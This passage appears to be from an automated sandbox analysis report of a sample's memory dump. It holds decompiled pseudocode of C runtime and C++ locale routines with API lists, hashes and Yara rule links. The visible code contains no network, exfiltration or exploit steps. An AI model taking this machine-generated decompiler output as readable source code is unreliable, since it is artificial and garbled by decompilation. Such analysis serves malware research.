												E6D4CCBD3( *((intOrPtr*)(_t249 + _t128 + 0x28)));
												_t131 = _t260 * 8; // 0x3b8e8
												E6D4CCBD3( *((intOrPtr*)(_t249 + _t131 + 0x24)));
												_t134 = _t210 * 4; // 0xe764e850
												E6D4CCBD3( *((intOrPtr*)(_t249 + _t134 + 0xa0)));
												_t236 = _v704;
												 *((intOrPtr*)(_v716 + _t249)) = _t236;
												 *(_t249 + 0xa0 + _t210 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t249 + 0x28 + (_t210 + _t210) * 8)) = _t234;
									} else {
										 *(_v716 + _t249) = _t233;
										_t115 = _t210 * 4; // 0xe764e850
										E6D4CCBD3( *((intOrPtr*)(_t249 + _t115 + 0xa0)));
										 *(_t249 + 0xa0 + _t210 * 4) = _v736;
										E6D4CCBD3(_v732);
										 *(_t249 + 8) = _v740;
										goto L2;
									}
									goto L3;
								}
							}
						} else {
							goto L3;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t160 = _t159 | 0x00000001;
					__eflags = _t160;
					goto L11;
				} else {
					L2:
					L3:
					_pop(_t257);
					return E6D49F8A5(_v8 ^ _t265, _t247, _t257);
				}
				L47:
			}

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,43D0C569), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,43D0C569), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

_memcmp.LIBVCRUNTIME ref: 6D4CEC2E
_free.LIBCMT ref: 6D4CEC9F
_free.LIBCMT ref: 6D4CECB8
_free.LIBCMT ref: 6D4CECEA
_free.LIBCMT ref: 6D4CECF3
_free.LIBCMT ref: 6D4CECFF

Strings

C, xrefs: 6D4CEAEC

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 5b760a59b52cd69c305e7e228e5495dee21fa1f6ef8e27d511d5b78f077a6201
Instruction ID: 1a3c7bc8f05b3a5f00a771042c70e21693b23577d1aa0770e0331c49117a068b
Opcode Fuzzy Hash: 5b760a59b52cd69c305e7e228e5495dee21fa1f6ef8e27d511d5b78f077a6201
Instruction Fuzzy Hash: 05C14A79A0521A9FDB24CF18C885FADB7B4FF49304F1085AAD949A7354E731AE90CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D8951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6D4D8951(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t89 = __edi;
				_t96 = E6D4D822B();
				_t1 =  &_v8; // 0x6d4f2130
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6D4D8289(_t1);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6D4C2188();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x6d54506c; // 0xff2bc58a
					_v56 = _t38 ^ _t106;
					 *0x6d545384 =  *0x6d545384 | 0xffffffff;
					 *0x6d545378 =  *0x6d545378 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t90 = 0;
					 *0x6d547a10 = 0;
					_t42 = E6D4D1216(0x6d4f2130, _t87, 0, __eflags,  &_v316,  &_v312, 0x100, 0x6d4f2130);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6D4CF26D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6D4D1216(0x6d4f2130, _t87, 0, __eflags,  &_v276, _t101, _v272, 0x6d4f2130);
								__eflags = _t50;
								if(_t50 == 0) {
									E6D4CCBD3(0);
									_t90 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6D4CCBD3();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L34:
						E6D4D8951(0x6d4f2130, _t90, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t90);
							E6D4D877C(0x6d4f2130, _t90, __eflags);
						}
					}
					E6D4CCBD3(_t100);
					__eflags = _v12 ^ _t106;
					return E6D49F8A5(_v12 ^ _t106, _t87, _t100);
				} else {
					_t54 = E6D4D8231( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6D4D825D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6D4CCBD3( *0x6d547a08);
							 *0x6d547a08 = 0;
							 *_t107 = 0x6d547a18;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6d547a18 * 0x3c;
								_t88 =  *0x6d547a6c; // 0x0
								_push(__edi);
								 *0x6d547a10 = 1;
								_v8 = _t85;
								_t116 =  *0x6d547a5e; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								_t118 =  *0x6d547ab2; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6d547ac0; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6D4C3CD0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6d547a1c, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6d547a70, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6D4D8225()) = _v8;
							 *(E6D4D8219()) = _v12;
							_t61 = E6D4D821F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D4F2130), ref: 6D4D89BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6D547A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4D8A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6D547A70,000000FF,?,0000003F,00000000,?), ref: 6D4D8A60
_free.LIBCMT ref: 6D4D89A9

Part of subcall function 6D4CCBD3: HeapFree.KERNEL32(00000000,00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000), ref: 6D4CCBE9
Part of subcall function 6D4CCBD3: GetLastError.KERNEL32(00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000,00000000), ref: 6D4CCBFB

_free.LIBCMT ref: 6D4D8B75

Strings

0!Om, xrefs: 6D4D8964, 6D4D896A
0!Om, xrefs: 6D4D8AD8

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: 0!Om$0!Om
API String ID: 1286116820-1120582717
Opcode ID: 11b8775a895fe89b20f50866c99e88db4d35c023c14f5d3405450eb113969c94
Instruction ID: 956a576b3449e319cdce558cebb04be028015dbfeedde5abf5a636d44d06db1d
Opcode Fuzzy Hash: 11b8775a895fe89b20f50866c99e88db4d35c023c14f5d3405450eb113969c94
Instruction Fuzzy Hash: 6351D671D0421AAFDF40DFA98C90EBEBBB8EF41314B21566AE560A7740D7309E41CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48FC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6D48FC89(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t66 - 0x14, 0);
				_t63 =  *0x6d546dd0; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6D46161C(0x6d546d60);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6D46171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6D4866BA(_t66 - 0x14);
					return E6D4A0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6D49162A(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6D461438(_t55);
							E6D4A3D74(_t66 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6d4ec0c4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6D49542F(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6D4A0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6D486FD3(__eflags, _t61);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6d546dd0 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48FC90
std::_Lockit::_Lockit.LIBCPMT ref: 6D48FC9A
int.LIBCPMT ref: 6D48FCB1

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48FCEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48FD0B
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48FD29

Strings

`mTm, xrefs: 6D48FCA5

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: `mTm
API String ID: 651022567-3082417625
Opcode ID: 9f27e8fce20a31ea323c1ea4c323588a862aadebb7e32bca45650c6021f66500
Instruction ID: 0894832fcf3229bd0a8ff7a66b689c557a890863b6d7fa86e5973079b594b630
Opcode Fuzzy Hash: 9f27e8fce20a31ea323c1ea4c323588a862aadebb7e32bca45650c6021f66500
Instruction Fuzzy Hash: 4F11A0758082699BCF05EBA4D840EEDB7B5BF94314F2A440DD612BB391DB74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48F8A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t330 - 0x14, 0);
				_t315 =  *0x6d546db0; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6D46161C(0x6d546d64);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6D4866BA(_t330 - 0x14);
					return E6D4A0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6D4913A1(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t330 - 0x20);
							E6D4A3D74(_t330 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t307, _t315, 0x14);
							E6D486653(_t330 - 0x14, 0);
							_t316 =  *0x6d546ddc; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6D46161C(0x6d546d88);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6D4866BA(_t330 - 0x14);
								return E6D4A0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6D491409(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t330 - 0x20);
										E6D4A3D74(_t330 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t234, _t308, _t316, 0x14);
										E6D486653(_t330 - 0x14, 0);
										_t317 =  *0x6d546de0; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6D46161C(0x6d546d8c);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6D4866BA(_t330 - 0x14);
											return E6D4A0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6D491471(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t330 - 0x20);
													E6D4A3D74(_t330 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t234, _t309, _t317, 0x14);
													E6D486653(_t330 - 0x14, 0);
													_t318 =  *0x6d546dfc; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6D46161C(0x6d546da8);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6D4866BA(_t330 - 0x14);
														return E6D4A0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6D4914EC(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t330 - 0x20);
																E6D4A3D74(_t330 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t234, _t310, _t318, 0x14);
																E6D486653(_t330 - 0x14, 0);
																_t319 =  *0x6d546dcc; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6D46161C(0x6d546d80);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6D4866BA(_t330 - 0x14);
																	return E6D4A0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6D491558(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t330 - 0x20);
																			E6D4A3D74(_t330 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t234, _t311, _t319, 0x14);
																			E6D486653(_t330 - 0x14, 0);
																			_t320 =  *0x6d546e00; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6D46161C(0x6d546dac);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6D4866BA(_t330 - 0x14);
																				return E6D4A0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6D4915C4(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t330 - 0x20);
																						E6D4A3D74(_t330 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t234, _t312, _t320, 0x14);
																						E6D486653(_t330 - 0x14, 0);
																						_t321 =  *0x6d546dd0; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6D46161C(0x6d546d60);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6D4866BA(_t330 - 0x14);
																							return E6D4A0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6D49162A(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6D461438(_t283);
																									E6D4A3D74(_t330 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6d4ec0c4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6D49542F(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6D4A0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6D486FD3(__eflags, _t313);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6d546dd0 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6D486FD3(__eflags, _t312);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6d546e00 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6D486FD3(__eflags, _t311);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6d546dcc = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6D486FD3(__eflags, _t310);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6d546dfc = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6D486FD3(__eflags, _t309);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6d546de0 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6D486FD3(__eflags, _t308);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6d546ddc = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6D486FD3(__eflags, _t307);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6d546db0 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48F8AC
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F8B6
int.LIBCPMT ref: 6D48F8CD

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F907
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F927
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F945

Strings

dmTm, xrefs: 6D48F8C1

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: dmTm
API String ID: 651022567-953901710
Opcode ID: 36d0125369753ea98ddb29667e5ed46db8f7604b0a6350bbe0c50b56be51e05d
Instruction ID: ab6e7ad93bd3696d87385bf5079dfe02f036ad382b19390295b5b474e263dabd
Opcode Fuzzy Hash: 36d0125369753ea98ddb29667e5ed46db8f7604b0a6350bbe0c50b56be51e05d
Instruction Fuzzy Hash: 4111A0758082599BCF05EBA4C844EFDB7B5AF94314F2A400DD611AB396DB74DD01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D49BB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6D49BB30(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t110 - 0x14, 0);
				_t105 =  *0x6d546e40; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6D46161C(0x6d546e20);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6D46171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6D4866BA(_t110 - 0x14);
					return E6D4A0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6D49C229(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t110 - 0x20);
							E6D4A3D74(_t110 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t102, _t105, 0x14);
							E6D486653(_t110 - 0x14, 0);
							_t106 =  *0x6d546e44; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6D46161C(0x6d546e24);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6D46171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6D4866BA(_t110 - 0x14);
								return E6D4A0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6D49C295(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6D461438(_t93);
										E6D4A3D74(_t110 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6d4ec414;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6D49D028(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6D4A0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6D486FD3(__eflags, _t103);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6d546e44 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6D486FD3(__eflags, _t102);
							 *0x6d4ea26c();
